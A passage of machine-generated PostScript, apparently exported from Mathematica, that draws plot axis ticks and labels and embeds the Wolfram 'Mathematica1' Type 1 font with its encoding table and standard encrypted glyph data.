setlinecap +180.205 237.508 m +180.205 235.77 L +s +P +p +0 setlinecap +194.779 237.508 m +194.779 235.77 L +s +P +p +0 setlinecap +209.353 237.508 m +209.353 235.77 L +s +P +p +0 setlinecap +223.926 237.508 m +223.926 234.611 L +s +P +p +np 220 239 m +220 253 L +228 253 L +228 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 220.926 239.668 ] concat +1 w +[ ] 0 setdash +p +np -1.926 -1.668 m +-1.926 14.332 L +8.074 14.332 L +8.074 -1.668 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(2) N +P +[1 0 0 1 -220.926 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +238.5 237.508 m +238.5 235.77 L +s +P +p +0 setlinecap +253.073 237.508 m +253.073 235.77 L +s +P +p +0 setlinecap +267.647 237.508 m +267.647 235.77 L +s +P +p +0 setlinecap +282.22 237.508 m +282.22 235.77 L +s +P +p +0 setlinecap +296.794 237.508 m +296.794 234.611 L +s +P +p +np 293 239 m +293 253 L +301 253 L +301 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 293.794 239.668 ] concat +1 w +[ ] 0 setdash +p +np -1.794 -1.668 m +-1.794 14.332 L +8.206 14.332 L +8.206 -1.668 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(3) N +P +[1 0 0 1 -293.794 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +311.367 237.508 m +311.367 235.77 L +s +P +p +0 setlinecap +325.941 237.508 m +325.941 235.77 L +s +P +p +0 setlinecap +340.515 237.508 m +340.515 235.77 L +s +P +p +0 setlinecap +355.088 237.508 m +355.088 235.77 L +s +P +p +0 setlinecap +369.662 237.508 m +369.662 234.611 L +s +P +p +np 365 239 m +365 253 L +374 253 L +374 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 366.287 239.668 ] concat +1 w +[ ] 0 setdash +p +np -2.287 -1.668 m +-2.287 14.332 L +8.713 14.332 L +8.713 -1.668 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0.75 10.5 m +(4) N +P +[1 0 0 1 -366.287 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +384.235 237.508 m +384.235 235.77 L +s +P +p +0 setlinecap +398.809 237.508 m +398.809 235.77 L +s +P +p +0 setlinecap +413.382 237.508 m +413.382 235.77 L +s +P +p +0 setlinecap +427.956 237.508 m +427.956 235.77 L +s +P +p +0 setlinecap +442.53 237.508 m +442.53 234.611 L +s +P +p +np 439 239 m +439 253 L +447 253 L +447 239 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 439.53 239.668 ] concat +1 w +[ ] 0 setdash +p +np -1.53 -1.668 m +-1.53 14.332 L +8.47 14.332 L +8.47 -1.668 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(5) N +P +[1 0 0 1 -439.53 -239.668 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +70.6 210.041 m +73.497 210.041 L +s +P +p +np 61 203 m +61 217 L +69 217 L +69 203 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 62.44 203.666 ] concat +1 w +[ ] 0 setdash +p +np -2.44 -1.666 m +-2.44 14.334 L +7.56 14.334 L +7.56 -1.666 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(0) N +P +[1 0 0 1 -62.44 -203.666 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +70.6 157.941 m +73.497 157.941 L +s +P +p +np 61 151 m +61 165 L +69 165 L +69 151 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 61.69 151.566 ] concat +1 w +[ ] 0 setdash +p +np -1.69 -1.566 m +-1.69 14.434 L +8.31 14.434 L +8.31 -1.566 L +cp +clip np +%%BeginResource: font Mathematica1 +%%BeginFont: Mathematica1 +%!PS-AdobeFont-1.0: Mathematica1 001.000 +%%CreationDate: 8/26/01 at 4:07 PM +%%VMusage: 1024 31527 +% Mathematica typeface design by Andre Kuzniarek, with Gregg Snyder and Stephen Wolfram. Copyright \(c\) 1996-2001 Wolfram Research, Inc. [http://www.wolfram.com]. All rights reserved. [Font version 2.00] +% ADL: 800 200 0 +%%EndComments +FontDirectory/Mathematica1 known{/Mathematica1 findfont dup/UniqueID known{dup +/UniqueID get 5095641 eq exch/FontType get 1 eq and}{pop false}ifelse +{save true}{false}ifelse}{false}ifelse +20 dict begin +/FontInfo 16 dict dup begin + /version (001.000) readonly def + /FullName (Mathematica1) readonly def + /FamilyName (Mathematica1) readonly def + /Weight (Medium) readonly def + /ItalicAngle 0 def + /isFixedPitch false def + /UnderlinePosition -133 def + /UnderlineThickness 20 def + /Notice (Mathematica typeface design by Andre Kuzniarek, with Gregg Snyder and Stephen Wolfram. Copyright \(c\) 1996-2001 Wolfram Research, Inc. [http://www.wolfram.com]. All rights reserved. [Font version 2.00]) readonly def + /em 1000 def + /ascent 800 def + /descent 200 def +end readonly def +/FontName /Mathematica1 def +/Encoding 256 array +dup 0/NUL put +dup 1/Eth put +dup 2/eth put +dup 3/Lslash put +dup 4/lslash put +dup 5/Scaron put +dup 6/scaron put +dup 7/Yacute put +dup 8/yacute put +dup 9/HT put +dup 10/LF put +dup 11/Thorn put +dup 12/thorn put +dup 13/CR put +dup 14/Zcaron put +dup 15/zcaron put +dup 16/DLE put +dup 17/DC1 put +dup 18/DC2 put +dup 19/DC3 put +dup 20/DC4 put +dup 21/onehalf put +dup 22/onequarter put +dup 23/onesuperior put +dup 24/threequarters put +dup 25/threesuperior put +dup 26/twosuperior put +dup 27/brokenbar put +dup 28/minus put +dup 29/multiply put +dup 30/RS put +dup 31/US put +dup 32/Space put +dup 33/Exclamation put +dup 34/ForAll put +dup 35/NumberSign put +dup 36/Exists put +dup 37/Percent put +dup 38/Ampersand put +dup 39/SmallMember put +dup 40/LParen put +dup 41/RParen put +dup 42/Star put +dup 43/Plus put +dup 44/Comma put +dup 45/Minus put +dup 46/Period put +dup 47/Slash put +dup 48/Zero put +dup 49/One put +dup 50/Two put +dup 51/Three put +dup 52/Four put +dup 53/Five put +dup 54/Six put +dup 55/Seven put +dup 56/Eight put +dup 57/Nine put +dup 58/Colon put +dup 59/SemiColon put +dup 60/Less put +dup 61/Equal put +dup 62/Greater put +dup 63/Question put +dup 64/TildeFullEqual put +dup 65/CapAlpha put +dup 66/CapBeta put +dup 67/CapChi put +dup 68/CapDelta put +dup 69/CapEpsilon put +dup 70/CapPhi put +dup 71/CapGamma put +dup 72/CapEta put +dup 73/CapIota put +dup 74/CurlyTheta put +dup 75/CapKappa put +dup 76/CapLambda put +dup 77/CapMu put +dup 78/CapNu put +dup 79/CapOmicron put +dup 80/CapPi put +dup 81/CapTheta put +dup 82/CapRho put +dup 83/CapSigma put +dup 84/CapTau put +dup 85/CapUpsilon put +dup 86/FinalSigma put +dup 87/CapOmega put +dup 88/CapXi put +dup 89/CapPsi put +dup 90/CapZeta put +dup 91/LBracket put +dup 92/Therefore put +dup 93/RBracket put +dup 94/Perpendicular put +dup 95/Underbar put +dup 96/Hat put +dup 97/Alpha put +dup 98/Beta put +dup 99/Chi put +dup 100/Delta put +dup 101/Epsilon put +dup 102/Phi put +dup 103/Gamma put +dup 104/Eta put +dup 105/Iota put +dup 106/CurlyPhi put +dup 107/Kappa put +dup 108/Lambda put +dup 109/Mu put +dup 110/Nu put +dup 111/Omicron put +dup 112/Pi put +dup 113/Theta put +dup 114/Rho put +dup 115/Sigma put +dup 116/Tau put +dup 117/Upsilon put +dup 118/CurlyPi put +dup 119/Omega put +dup 120/Xi put +dup 121/Psi put +dup 122/Zeta put +dup 123/LBrace put +dup 124/VertBar put +dup 125/RBrace put +dup 126/Tilde put +dup 127/DEL put +dup 128/FractionBarExt put +dup 129/EscapeChar put +dup 130/SelectPlaceholder put +dup 131/Placeholder put +dup 132/Continuation put +dup 133/Skeleton put +dup 134/LSkeleton put +dup 135/RSkeleton put +dup 136/Spacer put +dup 137/Cross put +dup 138/DblEqual put +dup 139/Grave put +dup 140/Acute put +dup 141/DoubleAcute put +dup 142/OverTilde put +dup 143/OverBar put +dup 144/DblUpDownArrow put +dup 145/DblUpExtens1 put +dup 146/DblLongLArrow put +dup 147/DblExtens put +dup 148/DblLongRArrow put +dup 149/DblLRArrow2 put +dup 150/DblLongLRArrow put +dup 151/UpDownArrow put +dup 152/LongLArrow put +dup 153/LongRArrow put +dup 154/LongLRArrow put +dup 155/ColonEqual put +dup 156/Diamond2 put +dup 157/NotSquareSprsetEqual put +dup 158/AtSign put +dup 159/Solidmedsqr put +dup 160/OverDot put +dup 161/CurlyCapUpsilon put +dup 162/Prime put +dup 163/LessEqual put +dup 164/Fraction put +dup 165/Infinity put +dup 166/RuleDelayed put +dup 167/ClubSuit put +dup 168/DiamondSuit put +dup 169/HeartSuit put +dup 170/SpadeSuit put +dup 171/LRArrow put +dup 172/LArrow put +dup 173/UpArrow put +dup 174/RArrow put +dup 175/DownArrow put +dup 176/Degree put +dup 177/PlusMinus put +dup 178/DoublePrime put +dup 179/GreaterEqual put +dup 180/Multiply put +dup 181/Proportional put +dup 182/PartialDiff put +dup 183/Bullet put +dup 184/Divide put +dup 185/NotEqual put +dup 186/Equivalence put +dup 187/Approxequal put +dup 188/Ellipsis put +dup 189/ArrowVertEx put +dup 190/ArrowHorizEx put +dup 191/CarriageReturn put +dup 192/Aleph put +dup 193/IFraktur put +dup 194/RFraktur put +dup 195/Weierstrass put +dup 196/CircleMultiply put +dup 197/CirclePlus put +dup 198/EmptySet put +dup 199/Union put +dup 200/Intersection put +dup 201/ProperSuperset put +dup 202/NbSpace put +dup 203/NotSubset put +dup 204/ProperSubset put +dup 205/ReflexSubset put +dup 206/Element put +dup 207/NotElement put +dup 208/Angle put +dup 209/Gradient put +dup 210/RegTM put +dup 211/Copyright put +dup 212/TM put +dup 213/Product put +dup 214/Radical put +dup 215/DotMath put +dup 216/LogicalNot put +dup 217/Wedge put +dup 218/Vee put +dup 219/DblLRArrow put +dup 220/DblLArrow put +dup 221/DblUpArrow put +dup 222/DblRArrow put +dup 223/DblDownArrow put +dup 224/Lozenge put +dup 225/LAngle put +dup 226/Diffd put +dup 227/Expe put +dup 228/Imagi put +dup 229/Sum put +dup 230/LParenTop put +dup 231/LParenEx put +dup 232/LParenBot put +dup 233/LBracketTop put +dup 234/LBracketEx put +dup 235/LBracketBot put +dup 236/LBraceTop put +dup 237/LBraceMid put +dup 238/LBraceBot put +dup 239/BraceEx put +dup 240/Slot put +dup 241/RAngle put +dup 242/Intergral put +dup 243/IntegralTop put +dup 244/IntegralEx put +dup 245/IntegralBot put +dup 246/RParenTop put +dup 247/RParenEx put +dup 248/RParenBot put +dup 249/RBracketTop put +dup 250/RBracketEx put +dup 251/RBracketBot put +dup 252/RBraceTop put +dup 253/RBraceMid put +dup 254/RBraceBot put +dup 255/Wolf put + readonly def +/PaintType 0 def +/FontType 1 def +/StrokeWidth 0 def +/FontMatrix[0.001 0 0 0.001 0 0]readonly def +/UniqueID 5095641 def +/FontBBox{-120 -220 1544 923}readonly def +currentdict end +currentfile eexec +D8061D93A8246509E76A3EC656E953B7C22E43117F5A3BC2421790057C314DAE3EFBFF49F45DA34B +424A961BE670A194E7E4BF0FF295DEE23134A14A7C08B6602621D885EE631B1D8D3003CF2093E039 +4D77FCEFCA8BA8965D1783DCAD9EFE6C7E420CF7B898933309A89F84721ADE7F3AE4443C5EAE8155 +759A9EB6F738F7BA81C192EE45DAD00F398FFD6904111BBD91BFEE328004F2A18BCCD98DCDB2CE23 +961B00F204E50EA022D00CE2B68E653626D4BB5AFA334A0D657307416FAF7AA8C43ED4DC541F1B7B +B7500B3F423D9D369F8192FD00A59FD5E6ABC70F788FB70976CC1907DDC309F4B690AA2D2BF12CAE +C493958CC0E76CE9EB5FF8BD1F1650F659E5C123EE455B7D77C39952C212AF319BF19A91E36DE52F +0EF84B602704BD6C7C94E1B0E067210DB919F6231755A2CC5D5FE129279B43A2E2CCD27F56F00B05 +C8AC10AB07FABBEFB3509088301FE78CAF8B440C5BA2FFE06BBFCD066046618F3B6AA2E4B17B296E +1F3F1560E19CBAD54E16E4B7A65622E468F6BDF97C50277E355D1DD8843D0A449A147FFBA071BA99 +CF70D7576DC18B96FEAF8070BF25F3A3141F873241EF4A07F332306B56F1D5909A4F233A9DB3A08E +E43DF38DD6DB2D6DAB908967A907303EE1FA04F048FA6EBC531738C170B8B0F095FF3B05D14C2BDC +272F7EDA8926A77D9CDA49A90AE1387A51A24ECDB2E4E287B0F95A83AD2EC0310F9B6F396AC10479 +835035FD5D4C84D91917FE8A8755C976504AB1A830ED516B5F325EA4ADFD115900D23039A2BC84EE +D21CC21E2BBE29A5E0CF28BE047CBD515DF7785F37DDD4474042B102A1F28193BB8567FF6FDEF811 +25CE9A504BE5011C0010DCEBCF321824C9DA249D8DB11F79298F7B674CEDB6F33C111F8B0115E407 +99E0FE1B6CE9F6B2A3EED1827A9CEB453D643FE5CE2540DCBCAF7B2EA2C8F0AE9434D4BAAEAB3488 +FEC7541D57179BDEAA0BB6145EA783E73E70E0AA71A4FA58E81EB510E9FD2CF4ACFBF28E48CA313C +CF5ED2BE032B7C9A07ABBEC9CCD8D5AC9F775D36BECC252B9FE01B6AA79A70E22478904DADDA08BB +7CA3B66F3A83AEEBA37406127353790348AE5FBD144ABD8E1B32D1BCC70E2BC22A63E854D38317E6 +BB97C52A6C9B0C6AB5C336CE2D417A714825DCD237F7486C33925A995CD8AD3B359176C4CA775FE2 +2C6F8A7C7343F31F39D1B9A5A744973BF65D655DDB59E3495B28DBE2A877EBB32A22A4AB8EB13C67 +02B239F6932E2DC8B4B88915923B1C2AFF2F876A31F765B91747D5A858BD632B0BE4F135AC484016 +AE1BC01E44B6653A58EE1380B6DF24AEB73220A36FA8FDE9A152C16E049D2F247A9AA71CD2DF3D9E +653054FAF518BBC1EEB43200DB0BACA93FEA9445FA5F32A99926C4F1F2370B2E3E03CEFBEECE5D5C +DE299FE1641A9CE0C90E42E7C465DF8C19C153EA76C11791F8E112853E708CD0F6EFC22E44808A44 +3686442645D643E7118D128BF34188FD313E53B8E951E605E96825738C4DC893D942C145C3E1153F +CDED16D1EE10374626F45781461FFC94C77D431BCF167FD29136A0B369631E139A59B06AC5281B3D +52470B38237B469C0E49CBE74C82A940F8AAD10E05C5DD2A8F3218C4BE40DCED0982770869190845 +D2E8BA2A1A2F9CF16DDDE418B6E2013C3258FBE9AFCDACCD57B01C4FEF3526C06FD5BAB6F195C557 +23A96FA3E5CDB2ADC9AA8989DF78F163F19E26F3B9EAF60D44B745FCA49B09D9CE5CC16D1E2C78C5 +A28F14D3374956E9721C0542A01A731A3D5A771C7B51FB72960BB22C99BC8F216530AA86C1A0346B +3D986EF1DF68BCC46EC4C809C6D54FB9C50F225ABA2C96965F4DE77E2C5D131318231C6773F0976C +DBD016B803C38B8923822BDF160FB87BBE744D0953EDEBDE87394282B9950C89F58824D731355E8F +A3CE364F742E3337A983BD1219CE8787CFA6925B560001F6F78343647821D408B60965966C16C454 +394D33268483F51984614FD9964CCE5F1AA4AB12144874A72D3FE97F4416ABE4213B4EDCA9ECF73A +937B562F978E059705E561A6D0C8B89B59B4CAB2248BFC4A6D3D98F89FF38A4D1C3E5A4570E2E2E8 +D328772E11DEA2116C260B13328045139A819F5489A2C302F311898230CD26DD03E6CE3BE75EDB86 +0D982FBC8E1E24D1F83E8CA64174495B2F32BDF0505FC96E9C65FDB0EB0C4ADA410F0A1C4BB4D551 +93B1AA5EA1F988882A56413F77CF24FF6516CD5095077BA566116797895FD7EA616D10510957025A +1DA05064FD9176303A248C94CE2A9875C03C7D8755A1A8010B712B64BAD73BEA4195D51A328F076D +12C0E52E87D98A5269D157D544CD7B4E1CAAEA6BDD59F08D0C5FBB84A6B099BECF8BEB721A874BAA +1BD1F8CDB5ED5CD3B49A763EAA36D33837667A6643B83537EF5515DBF7659E28692E0ACEB48FD051 +45534A443092E0A510B05B5B51B402CB3372A4E8BAF98A7FEB6D8BEF6B364A5EA0F3FDF301A44EE2 +3485D4493E7B4C33E0E352202931188D156983C40F7A4B615B6F5281B33FB32A2E6A0F7AE84BEA2C +5C3635D7DA17371D608847EB402270B83293EC09E4B1D85996C1CC81196BE590EC9EF0F258364746 +BC4763976FDDB3707D37AFCBDC0F4EB2B1502F137EBBB1541B992EAD43B5D64CCDF505FF2F127115 +4857C69B689A11760979F6D2BB032CF0DCCBB33D2B6F6D6BB29A1D0E371AA5869A408225C0AFF523 +CEFB08A7D3D17DF9064010363196CC569C436E720B1B4573CDAE1CD93A10FD2D4ACB14E47046B5B7 +66B75B40BA97027FEC4218980B002FAB60A9F1F5A37861B9A63F696732F8127B2C6F036BF32311B8 +FF08A489E88218092D57A99C8981EF8CBBD09DF49CC836B9C1968692D1FB551F47619F020289F1A3 +D3898A96DC1C7D39A21B49C2D0DD9508CB8A8BD6A5EB40FF86F555FA32017B67AEC07BECD659E8C4 +8DD1D43E8D1EE08A117479015F78BF20D3318224572D9C90884856E4307A8AFFC83EDD317B008484 +3BBE8EB2A4E2D70077A639FE3637C3DCF87C67F1BE62E63CC67BCEF8EBD07E030524A53DD440F2A1 +3A019B7AA89E155AAD1497974258A01DA45DE1D94BB9F925290FE9BDDA29EA3F2BF1E64DF7EBCFC4 +23AB2C7310D9D87A5CA673EE95189135E1B134B431B231428FF2BF64C8F155CBDDAD17BCB524CF7E +ABD66B75705BFFB1DDB27B72D681D7AA19FAD0FF23EEF028B606DD20D58588AACB299A3CF38372A8 +E7494A65227C1E4A231AC7843962B8A4A7BDD90F3F8B83277E696F3514139BB8DD207641B62286F0 +0E32C7FAD7029DC0E092564C7CE1BC5240FCBFB00A06F075D9536F0326CFFBA958BA7A1A11AA047B +B14E7DE16761BB0FEF19ABE85154359807C339961B9695CDED59E489CA4D9BB75D86D9EDDF0502BC +0B4EC36B1D71FCD4E03881ECEC703E5DA23B3F5DB98CB8DAED81D5BA20B844A92A4B92FE5B082952 +6837237C7F994786878404BE744D0953C676E52CB05FCE193E8827F977B31929E36E320E770A6F1E +972B84AFA21E01719759DF0132C5CF9692BAA487E86E8453C09FF97642600D1024ED5D6C7D5B387D +CB5E6147D20B4A14D7D485B5747D765C5A1CA40B9416DC4EF5DC08F43F0706B27B1C90E901556E1C +EFF304EA8DF8D727E4B7E7CEAD14E4FC7E76002DBC37B92BD0E58AF29DA7DA91E6F99DADF1A9CBDD +04648E2F5B811F2AF0729646B17D32D7EF25AD47E267EE53A61A7CD744C9ABFDB1EDB71C0705412B +15769188CA1601AF0395796FAC0E2139EF90FAA65D27AAEEEE319D2831A56CE82203523097D0574D +22742D17E519D95560B8445B5B29033BF3454B94F20C23EBE8B90DDF26D903F1D66CB39D3A64579D +39D136C537CCD9FF2D6ACE5F79DE696C7330C0C4EA179D7911B7B67858D86CEE0833AB1E105B1993 +2A9BD572C41E78FB4A2A2421514DC2066E2F56101A9027F4BBA5D48E5DA9218E81CE46B95B50380F +560C67A5D547A8D32610AECECBB6F5A09DF44994F6DAC64F7399C07E182033BC1B9A32B69C41FDFC +7E1DCDDF273F045F154D727AFEE3CDB816CF2ECDB6733C579276353DD59C9D2AFA455935C1FCD0AB +7D57F9DD79FBCC7A45E5E5A501FF17EE1C5FF0823C6FDE29C60F85F6786940D8E3540E891B5BF7F5 +D36C57AC3AD359BFAB12B215E7FC94B933386C250E6B236506FA3D151ABAD893A817772071C09144 +6E5FB23A17591A4CECAA46DD46E3C41B4578F21D8894A59B72FAF6F88EE6E514FBD2FE69447D2B59 +9A6AA8BC5C1FD5C25E50BFB5CE5DBF5AD5771BC42FCC3706B6E9F7E4FAAFF2E63ED1684C5A4C136D +609D03E31EBCF31E864AAA74D8DDBCA52F85CCF14AB739CC55617EFC964D6CC6988AA45245B19CE2 +B63CB865DF1F1DA4A200A4A043C5CB706CD303EB31C32866ED92077AB11BF136D158840EAC67E7A1 +1BC2BFDCD5894AF735D677E1AC98BF3F19F69AF75355F168632037F6EDEBF61BE5854057AD05972C +7DA8D37AE65D35738547A9D835C6351D8D732F8C0DC49D7605F00A6A6045559D3A0B0CC21DFDD75E +2FCF25522001741EBBEB5CC97DDBD9DDCE490FE3CB186C101940DD02CACB685ECCB8C1DEDCDD4156 +F5F9F6B3CA53EC6E7E8A2F8159451CD5479D91BFBF91C6B32A1E0053017369330EAD2DDE323BCAC5 +EEC91A595473F447355B1BDFB873D0B538BF54AFB8EAADE5309E1B74283218F59272E59619D66405 +E74B5A9D6323CB76AF00FB27FD984F740601248C7206F59EF7FF4E95AF95327D12C47D2D34CBFF33 +29F28236831D7F0FD9D633B940D8282E1F1D5D95616CD839C6B41A7195A22B7A320864E48943CE99 +C68E3591A97689986A6536C3A1C37DA9838FF71A8C1A03094537C95D3585DF5AD9292874D8D05720 +030133B02E2754DA24712B52D6D8871422C709532B09D147EC8ACD861FA5392A82A6C2981347E327 +1986017B8315822B5FCB19A1B31BF6909E0D6490EC823434BFCE031045D20FFC675A73EBD7A39A50 +44C3B40906186CCF6E8502CD7915F053BC8CF6BE9FDD9A0330AE943D5C9A11D60D43F5BBE8A045EF +CDB7D19C0053F4F082303442C35C432E0DA4408C5917D24A6658DB807BD754AF140CE84A34F79851 +9323060D60F4EAC0E82D3E17042BB6729C69A8B8774904C6214C2EB016C528DC1428DB41075AA6C5 +4E4D849901838C6B6DADF7B67CD0CBC6EE1B415B44654D89397274D4A6AD2BA69DD81567F5B802F2 +684DD3516ECA0F6D66046EDA0B2B38F420A238D67D98676925ECBE6711D64DAE5DBE8AC5473A2EE9 +97AE65F0715A2E5DB2C75F20D9939EF58692EDA3AEA81F25AEC888327CFA6CC13D496714E63A1A87 +11FC50250D6D23FC7A8017038281F659A685ED7F1BB1ADBF8833ABC6DBEC0D96D08334E58C67E0F9 +0046132F0D4FBCB9CDF52EE74561498B42701AB826A6DD77F46C14753748E1EC66F4BD3583FCB4F1 +DC91050CF18B0D51BC366549261282779FC9694A7B987973C0D59F65CFF3CDB88D23952E46F5EEC1 +BDA0DC354188C11B0FA191F5C11A45BB9093701B33B8E7AC1A8621793D5326E92CDD3A76FB9B67D6 +860567B9CEE7B9F9056C6E9971F642DC0BCC1D2882B5BDF1B1CDCAA3FC61775A74E70CDFC128DE0F +9606091BB8E53905108EE77A1D3C506550FCFCAE454B020379BE3A7D6C62D162697AF1383F7BC8F2 +34FD616324C1E56E3E440277862CAB2C02395D9937816117F71A6828344182E6B5AF2799E29A6611 +9C0543E135300E44746EF2EBA57C4EABB1A15D8AC6D037F4BA2BE1EB4D1A7496F9711FC67E56D4D0 +FDA4D810B5383A72ACA15872DE9F3A9890E33759CE4DA493691BCA47A92E42D950DF588C3574D6FC +72B5AF7DDE915E3F5925B3E97DEBE6A4208CE7337754045607679296C4EEEA3A3EF1915E85EB1A32 +F1BBADB2904B09806631E20BBF5E57AF11BC784C75BF049B4BC7E479F1D4AE7754CBED7B11ED80A5 +2DD0006FAE5CC23A7C234CF628B42F4104A490E7D59E8B1F2A1395D37641C478FF8CB9FB602B29FD +3E48D6087CAEE48B523887F27F69DB32BF80B760B030A6766F8F9B19DE70704DAF81D3DED2BF663D +89B5BD8AF253BB8FA59DF84A52FDED83D2737532B6D66AFB9EF0446ACD44BFAB797AB9FDB47F2E18 +8F0A55887853772EBFD029B5FA0AFBAF10A88D464BD6F634C5839B230D583E36671A51DDB1EBF471 +8ABB84D057729D514751B0EEF4F756B91DEDAD7D9AD529B3886008F1F32645F3A205F304B2A8D808 +D37A38E389B8587E8D3654DC374568FCEBBA160395BE1D132B1ACB434164525FBF250A5AA30F3520 +F0F2A75F9D1B7C6EAB0223C209A120D894D6ECA336B57B7F2AB0E2A94E6616D7539010C700311966 +7B4A9EB3A812FEF4D100AB4C036401D21DDF8AEB393074638D154418D3A7AE51CD1F0C2D5CF4B475 +3B582D5071F91E6D3AFBFB09EAABBEAB2A60A5D388D16232939B5483CF7D5C1C9D05DDC85B266F39 +6F61E179AB9FAB644040014293EB53F2B50E8751F9D92D1DAE8DC89594905A39357C0098265FBD24 +E407F9A22027E36D5608FAF15BD9E354228E3BA943EC30301ABB2CB105F3B6D57C001EBF8328A8CA +318A7B1B999AE8BF9E2FD530B669640116149B622EB3C0A8CCDE62449DE9D39E0F5E5E01CBBF4F5E +52B33A2BD60B52FA4A5CE98B7313FE4C3FA30FA07DE4516109C3EAEE97ABE430C505647DD8B3DBF2 +BB4B3A806B14A9E0F629863F15D12A1CA62E8E055FA6ACABDE1926D3231CAC271C30A3F7AAC6084D +D88628B943052B618E4E39148600AC1EDB57B0835C291F73D29C51FCA3C5EFB1DB18A5CA47433B45 +C57EB3CB28AEBC68E4171E6DE357793B0FD2A1F4E76180248017112674DAD7ACA6ECAAF209CA174A +5603CEA5CE528F20919443900636E2FC79C303EA7B467A3F001EA8CB849BCF28BF40A3364C08ABC9 +B5D935CFEDA827A8C3FE2F6ABA54017D2AD0393A05AE21F7AE1F58AE1E992B5C889219DA157FA7EE +92E291DE2F9DFC244F2CF0FDCEFCACC487F0EA830985B687556D5AF53B81814DE9CE0C6C430DCBCE +51EBC6091B4E0227732E07DF20D59E9EED4D8A83761CED84CCE244BFD6A39103A2B48A684AEC9210 +5C94495D54FD6690AF857E5A3915E6A15689F1816F75F1FC8D5769B240639B339EBE54BC6D84794D +50F4EBE892530351984C6F8BEBE097CD46F4FED7D46E32830A16F77C13F13D17003737482F02D1B6 +F04C57B4C2B1929AA315B4BE1C7C9CB55F8981508546B67E4EBF84B6026C355C5E4E07CD98C95F07 +56F6643FB1DD7D8C77C4AF4C4F23602DD3F61D1C46583071AC460E74084F7F7CF812BC53975CAAF8 +B3C1160B5D6864AF08A1733FA893CE4248C8F8B46AEFCCF317DC726BC1E5F2445E462E0591BEAAEA +49AD8E4E2D3CF07F900EC46D596E9CDB3A8710A0B93CE5DA9D35E612596A6374F35AED0EF55DC46A +8E14A91163B87417259DE926BBC3FC5423FF0AE2AA6D740BFFD26981A57C8C1D97FB04A90A567296 +B07437F94C8FFF4709213DD5D8862A777CF3F97723F43A4F913F4A30F7554ACDAE34713654E21731 +C594C3718C0547FCDAF7BB1620B2D6BB19E65596A585290CC43F50B34A2FE6EB1E495ACFFB16DFEE +8784B66FCB9359600412969E2BDA330C421C68345A797C49728450A6CF41C926AE8EBBE80BD97863 +593C3E8AB5415A8BA625957F242378948F5C7EA9C2641312E8E46955FE5C1A1824C71D3B0C9FD211 +7CC965DA7C21D257587F291AB7C594459A11B977A278C74CF5E6598B0C75ABBB2FC1B3D167D7E31D +B519F4A0BDA650A3FE7F1A281DB9B69B57A23656BD820B22D0E30B07361FE7C90933E24A32B6DE2D +F240635D543315226E32487F264AFE83EFEAC74117321A82A92F4FC7B259F26DBE74C966B4CB3F4E +3499E30B9B326F72D73919D9FA9024AAC0B95B6751AD4CE569CC3DDFC399428DF1298FB1733FFCE6 +240FB3BE3A2837E1A66E08B784CDD131B5A61423508000785CDC5610CE4DA1DD314131767C8857E3 +3D9741EF3FD7B8D0AF0371CFFA3DCF74FF2D3B421AC0339EBC05FB4B61A2F46D6BD1144747AD148B +7968D7DF4D0F742AB39B0A04A88D66F5CF9876970879879872BFDA0C56C253DE5C72016B4990CEBB +2455DCDEC7465EE7C7E1C557B570E9F3EF3E31A22DC8AB9B17F34F48E135BE7820ACE383DB7C5B05 +8A9DC855C6850E49AB7D7D00ED2D23C50AEE671B11752F0A682EFE179CECBFAB47B76676AC0E8FD1 +0A47353D3AC3477A59B0F3CAF22849DE97AAC8B79935F7C57F3052DE7E13BA0FE7CEC4685C86E841 +EA8C7D6734D0FEEFF538CC2AA1414EC9126637E169FBE4ECAFDFA29A08451B25954F0094710195E1 +69E0A6004419E432E9319BE2AEC8D93407B25B758336946C6E30032657DD857BE9C0A05F487423D2 +0C2772D4416D27FEB5CCC971DDEDFE9B8C2D7DF9DEC90D0868D5DD18850BE567A04D08310883D9B2 +D50B817D0690F8550E238C1139C0A117B48199B1B4D489C9E52C58E0CA75E6C386ADD447D8AE52D1 +D979FD52A50D82BBCB8867B5D49C19BDEC414929DB67A00AF7C6482A87E46BD11D8E4E52783E5845 +FB2CC7439F99FF6552C7288354B436B1C361AB8C2932F77B14A50A7407FC0BCC29662D710248CA46 +AC42A03FBBEF9C972783942F3721BD32BDA3273D1E353D9E013D4CFF630BFE4E7C2963FECFE350A2 +860421D17D6ACA888FA26403726A0E16BD10638D8511A2C8A36C99E9B72A422038E1149BF88A7CA1 +B2DB196333F3AD32D6FE28F18FE1ADA06FD25E4597936A924E71C188B9E8779BDBA928A182042C96 +F6A14A6FAB5C1A819DB8E9374E32F77393734A65606809E90D188F749180A3E6CA7AD8044E168677 